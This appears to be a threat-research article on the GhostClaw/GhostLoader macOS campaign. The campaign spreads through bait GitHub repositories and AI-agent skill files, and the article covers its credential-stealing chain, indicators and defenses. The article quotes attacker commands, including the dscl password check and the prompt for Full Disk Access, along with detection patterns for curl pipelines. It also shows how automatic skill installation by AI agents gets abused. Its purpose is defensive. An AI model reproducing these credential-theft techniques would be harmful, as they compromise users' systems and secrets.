GhostClaw/GhostLoader Malware Deep Dive: GitHub Repo and AI Workflow Attacks on macOS

Introduction

In March 2026 Jamf Threat Labs and JFrog Security Research disclosed a macOS‑focused malware campaign codenamed GhostClaw/GhostLoader. The researchers examined at least eight newly identified GitHub repositories and uncovered additional infrastructure and infection vectors beyond the previously reported npm‑based delivery.

Initial Access via Malicious GitHub Repositories

The attackers publish repositories that masquerade as legitimate tools—trading bots, SDKs, and developer utilities—often accumulating hundreds of stars to appear trustworthy. Repositories initially contain benign or partially functional code, then later inject malicious components to gain trust before delivering payloads.

2.1 Manual Installation via README

Some repos include a README with step‑by‑step instructions that prompt users to run shell commands, typically using curl to fetch and execute a remote script. This approach relies on user interaction and trust, bypassing package‑manager safeguards.

2.2 AI‑Assisted Workflow Installation (OpenClaw)

Other repos contain a SKILL.md file targeting AI‑assisted development workflows. In frameworks like OpenClaw, an AI coding agent automatically discovers and installs external “skills” from GitHub. The SKILL.md appears benign, defining commands, dependencies, and entry points, while the malicious actions occur during the installation phase, allowing code execution without direct user interaction.

Execution Chain and Multi‑Stage Payload Delivery

3.1 Bootstrap via install.sh

The provided install command retrieves and runs install.sh, which first performs legitimate setup tasks—detecting architecture, macOS version, and Node.js presence. It uses curl -k (insecure flag) to download Node.js, disabling TLS verification. The script then invokes the next stage based on the GHOST_PASSWORD_ONLY environment variable, which controls whether a full interactive installer (value 0) or a streamlined credential‑stealing path (value 1) is used.

3.2 Credential Theft and Payload Retrieval ( setup.js )

setup.js

is heavily obfuscated JavaScript that, once executed, clears the terminal, shows a fake progress bar, and prompts for a password: Password: The entered password is verified locally with the macOS binary dscl . -authonly {username} {password}, avoiding standard authentication dialogs. The script can also display AppleScript dialogs that mimic macOS security prompts and, if needed, open the System Preferences pane to request Full Disk Access (FDA) via:

open x-apple.systempreferences:com.apple.preference.security?Privacy_AllFiles

After obtaining valid credentials, the malware contacts the C2 server at hxxps://trackpipe[.]dev, retrieves an encrypted secondary payload, decrypts it, and writes it to a temporary file such as /tmp/sys-opt-{random}.js. This secondary payload (GhostLoader) runs as a separate process, passing harvested credentials via environment variables.

3.3 Persistence and Anti‑Forensics ( postinstall.js )

The secondary payload invokes postinstall.js to extend the intrusion and erase evidence. Variants either clear the terminal and perform a global npm install of the long‑standing package antigravity (creating ambiguity with a legitimate dependency) or simply display a benign success message. Persistence is achieved by writing files to user‑controlled locations such as ~/.cache/.npm_telemetry/monitor.js, mimicking legitimate npm telemetry activity.

Infrastructure and Activity Tracking

All observed variants communicate with the same C2 domain trackpipe[.]dev but embed unique UUIDs in request paths. They also set distinct NODE_CHANNEL environment variables (e.g., stablehungryavocado8, notableunfortunatecookie, starredgrumpyhay3) that the secondary payload uses for further C2 communication. Reuse of a single domain combined with per‑repo identifiers enables the campaign to segment activity across multiple bait repositories.

Conclusion

The campaign demonstrates a shift in software‑supply‑chain attacks: attackers move beyond traditional package registries to exploit trusted open‑source ecosystems and AI‑assisted development workflows. By leveraging familiar installation practices, they achieve low‑friction code execution on macOS systems.

Indicators of Compromise (IoCs)

Domain

trackpipe[.]dev

File Paths

/tmp/sys-opt-{random}.js

~/.cache/.npm_telemetry/monitor.js

Environment Variables

GHOST_PASSWORD_ONLY (0 or 1)

NODE_CHANNEL (e.g., stablehungryavocado8, notableunfortunatecookie, starredgrumpyhay3)

Legitimate Tools Used

dscl . -authonly (credential verification)

open x-apple.systempreferences:com.apple.preference.security?Privacy_AllFiles (request FDA)

Blue‑Team Defense Recommendations

7.1 Terminal Detection and Monitoring

Monitor shell commands that download and execute scripts, especially those using -k or --insecure with curl / wget.

Detect usage of dscl . -authonly, which is an uncommon credential‑validation method.

Watch for creation and execution of temporary files matching /tmp/sys-opt-*.js.

Alert on writes to non‑standard npm‑related paths such as ~/.cache/.npm_telemetry/.

7.2 Behavioral Analytics and UEBA

Enforce code‑review policies for AI‑assisted development tools like OpenClaw.

Detect network connections to the known malicious domain trackpipe[.]dev.

Flag anomalous environment variable settings for GHOST_PASSWORD_ONLY and NODE_CHANNEL.

7.3 User Security Awareness Training

Educate users to avoid executing curl | bash pipelines without verification.

Encourage verification of GitHub repository history, star counts, and code reviews before running installation scripts.

Highlight the risks of installing AI‑generated “skills” without additional security checks.

7.4 Supply‑Chain Protection

Implement internal proxy repositories and scan all external dependencies for malicious content.

Apply the principle of least privilege in development environments to prevent automatic granting of Full Disk Access.

Enforce code‑signing policies to block execution of unsigned scripts.

7.5 Containment and Response

Isolate infected systems immediately and conduct forensic analysis.

Force password resets for any credentials that may have been captured.

Deploy Endpoint Detection and Response (EDR) solutions for real‑time threat detection.

Summary

GhostClaw/GhostLoader represents a new trend in software‑supply‑chain attacks, targeting AI‑assisted development workflows and trusted open‑source repositories to deliver a highly obfuscated, multi‑stage macOS payload that steals credentials and establishes persistence. Blue teams must incorporate AI‑enabled tooling into their threat models, create detection rules for the described behaviors, and continuously monitor related threat intelligence.